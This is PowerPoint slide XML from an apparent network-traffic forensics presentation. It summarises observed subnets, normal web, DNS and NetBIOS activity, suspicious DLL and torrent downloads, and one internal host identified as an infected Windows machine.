                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t># of Unique IP Addresses</a:t>
                      </a:r>
                      <a:endParaRPr sz="20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808</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" u="none" cap="none" strike="noStrike"/>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700"/>
                        <a:buFont typeface="Roboto"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Count of observed IP addresses.</a:t>
                      </a:r>
                      <a:endParaRPr sz="17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005800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="2000"/>
                        <a:buFont typeface="Roboto"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Subnets </a:t>
                      </a:r>
                      <a:endParaRPr sz="20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10.0.0.0/24</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="2000"/>
                        <a:buFont typeface="Calibri"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" u="none" cap="none" strike="noStrike"/>
                        <a:t>172.16.4.0/24</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="2000"/>
                        <a:buFont typeface="Calibri"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" u="none" cap="none" strike="noStrike"/>
                        <a:t>10.6.12.0/24</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" u="none" cap="none" strike="noStrike"/>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700"/>
                        <a:buFont typeface="Roboto"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Observed subnet ranges.</a:t>
                      </a:r>
                      <a:endParaRPr sz="17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73150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="2000"/>
                        <a:buFont typeface="Roboto"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t># of Malware Species</a:t>
                      </a:r>
                      <a:endParaRPr sz="20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1</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" u="none" cap="none" strike="noStrike"/>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700"/>
                        <a:buFont typeface="Roboto"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Number of malware binaries identified in traffic.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1700" u="none" cap="none" strike="noStrike">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45700" marB="45700"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6191" y="0"/>
            <a:ext cx="11745200" cy="8012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t>Behavioral Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="Google Shape;371;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11606948" y="6580000"/>
            <a:ext cx="423600" cy="278000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="12190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72" name="Google Shape;372;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485479" y="989815"/>
            <a:ext cx="9187200" cy="4998000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="1219200" lIns="609600" spcFirstLastPara="1" rIns="609600" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Users were observed engaging in the following kinds of activity.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1067"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Normal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> Activity</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-237061" lvl="0" marL="457189" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1067"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>HTTP Traffic</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-237061" lvl="0" marL="457189" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>DNS Traffic</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="237060" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1067"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1067"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Suspicious Activity</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-237061" lvl="0" marL="457189" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1067"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Dynamic Link Library (DLL) download</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-237061" lvl="0" marL="457189" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Torrent download</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-237061" lvl="0" marL="457189" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Active Directory set up on the network.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>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365779" y="2674684"/>
            <a:ext cx="11460400" cy="10564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FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Normal Activity</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="Google Shape;378;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11477033" y="6609600"/>
            <a:ext cx="349200" cy="140800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="121900"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txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6191" y="0"/>
            <a:ext cx="11913200" cy="8232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t>Web Surfing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Google Shape;385;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11907008" y="6640100"/>
            <a:ext cx="130800" cy="52800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="121900" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Google Shape;386;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193500" y="1133863"/>
            <a:ext cx="11446400" cy="4870400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="1219200" lIns="609600" spcFirstLastPara="1" rIns="609600" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-114300" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1333"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The user at 10.11.11.195 has spent time on a lifestyle blog.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-260340" lvl="0" marL="380990" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1333"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User 10.11.11.217 visited iphonehacks.com</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-260340" lvl="0" marL="380990" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1333"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User 10.11.11.195 visited sabethahospital.com</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-260340" lvl="0" marL="380990" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1333"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Associated with web browsing, we see many DNS queries.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="387" name="Google Shape;387;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2474675" y="3167450"/>
            <a:ext cx="6253701" cy="340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6189" y="0"/>
            <a:ext cx="11620800" cy="8484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t>NetBIOS Traffic</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Google Shape;394;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409500" y="922971"/>
            <a:ext cx="9717600" cy="736000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="609600" spcFirstLastPara="1" rIns="609600" wrap="square" tIns="121900">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Google Shape;395;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="577816" y="1369331"/>
            <a:ext cx="10452800" cy="1324800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="1219200" lIns="609600" spcFirstLastPara="1" rIns="609600" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-262461" lvl="0" marL="237060" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NetBIOS provides session services, allowing applications on separate computers to communicate over a local area network.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-262461" lvl="0" marL="237060" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1333"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>These connections should be expected on an internal network.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="237060" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1333"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="533"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="396" name="Google Shape;396;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="484100" y="3309158"/>
            <a:ext cx="11223798" cy="26951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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365779" y="2674684"/>
            <a:ext cx="11460400" cy="10564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FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Malicious Activity</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="Google Shape;402;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11477033" y="6609600"/>
            <a:ext cx="349200" cy="140800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="121900"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aeeaa6d127_0_58"/>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Malicious Activity: Infected Windows Machine</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Google Shape;408;gaeeaa6d127_0_58"/>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82600" lvl="0" marL="609600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>172.16.4.205 is an infected windows machine. We see this machine connecting to several other machines on the network</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
